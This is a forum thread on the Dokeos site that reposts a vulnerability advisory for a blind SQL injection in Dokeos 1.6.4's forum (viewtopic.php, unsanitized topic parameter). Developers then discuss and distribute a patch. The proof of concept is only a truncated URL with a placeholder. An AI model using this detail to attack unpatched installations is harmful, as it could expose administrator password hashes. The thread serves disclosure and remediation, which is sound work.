Dokeos Forum

[QuEsT]

Dokeos 1.6.4 SQL Injection Vulnerability


Author: Alvaro Olavarria - aolavarria at secure.cl

Affected: Dokeos <= 1.6.4
Status: Notified hereby
Vendor url: http://www.dokeos.com


Vulnerability.

Dokeos was built using Claroline's code; it inherited several of its features including an old version
 of phpBB which is being used as the forum for the courses.   There is a problem  in the “viewtopic.php",
 where the $topic variable is not correctly sanitized and $forumview is equal to “threaded", that would
allow an attacker to inject arbitrary code to the application.


Impact

An attacker could use Blind SQL Injection to gain access to privileged data like the password hashes
for the administrator user and so on.


Proof of Concept

http://localhost/claroline/phpbb/viewto ... ed&topic=1[blind_sql_inject]


Greetings

Rodrigo Guitierrez -  rodrigo at secure.cl
University of Los Lagos in Chile "for lending the required equipment for testing" >:D

http://lists.grok.org.uk/pipermail/full ... 44995.html

<strong>note by admin: Use the file attached to close the sql injection hole</strong>

[Hugues]

Dokeos was built using Claroline's code; it inherited several of its features including an old version of phpBB which is being used as the forum for the courses.

Claroline <strong>1.7</strong> is NOT concerned by this security hole. And the problem has already been fixed in Claroline <strong>1.6</strong> (see last 1.6.* version available in the<a href="http://www.claroline.net/download.htm"> download section of the Claroline web site</a>).

Concerning Dokeos, you'll find attached to this message the patch fixing the security hole discovered by Rodrigo Guitierrez.

Hugues Peeters
<small><strong>Claroline</strong> - Open Source e-learning - <a href="http://www.claroline.net">http://www.claroline.net</a></small>

[pcool]

indeed, and I'm afraid there are a lot of holes for sql injection in the version of phpbb that is used by dokeos.
For dokeos 1.8 there is a completely new forum that has (hopefully) less holes

[pcool]

Thanks Hugues !!!

[QuEsT]

Concerning Dokeos, you'll find attached to this message the patch fixing the security hole discovered by Rodrigo Guitierrez.

...sorry, but that was discovered by Alvaro Olavarria...

I'm afraid there are a lot of holes for sql injection in the version of phpbb that is used by dokeos.

...it's true and very possible...

For dokeos 1.8 there is a completely new forum that has (hopefully) less holes

... really, that is the best solution... it does not have sense to continue working that old and disordered code mainly.

Good Luck with Dokeos 1.8!

<em>Note: Very fast patched.. congratulations.</em>

[digibyte]

Where could I download the patch?
Or what CVS command should I use to get this?

[pcool]

the patch for dokeos 1.6.4 will be released this evening

[roan]

Using cvs commands: normally this is possible, but anonymous cvs is currently not updated on SourceForge - they had a big server problem a week ago and are still recovering. Developer cvs access works again, but anonymous access will come later.

There is a new <em>Dokeos community release 2.0.4</em> that contains a patch:
<a href="http://prdownloads.sourceforge.net/dokeos/dokeos-community-204.tar.gz?download">Dokeos community release 2.0.4 (tar.gz)</a>
<a href="http://prdownloads.sourceforge.net/dokeos/dokeos-community-204.zip?download">Dokeos community release 2.0.4 (zip)</a>
<a href="http://www.dokeos.com/wiki/index.php/Dokeos_community_2.0.4_release_notes">Release notes</a>

A new version or patch for Dokeos 1.6.x will probably be released tonight

[pcool]

Here is the file that will be in the patch

Just overwrite the file on your campus with this one if you have not made any changes in this file.
This will close the sql injection hole.

[digibyte]

thanks for the quick reply

[domifreitas]

Something seems to be wrong with the file provided. After upgrading, when trying to view a topic, I get that file 'viewtopic.php' edited, not the topic...

[Thomas]

you should rename it viewtopic.php instead of phps

[domifreitas]

I did.
Someone else has the same problem?

EDIT: it was a problem with FireFox and its download. I got the file in another way. Thanks.

[misterlu]

It's possible to post in this topic, where is the sql injection and the correction (only the line needed for remove them) please ?

Thanks in advance :-)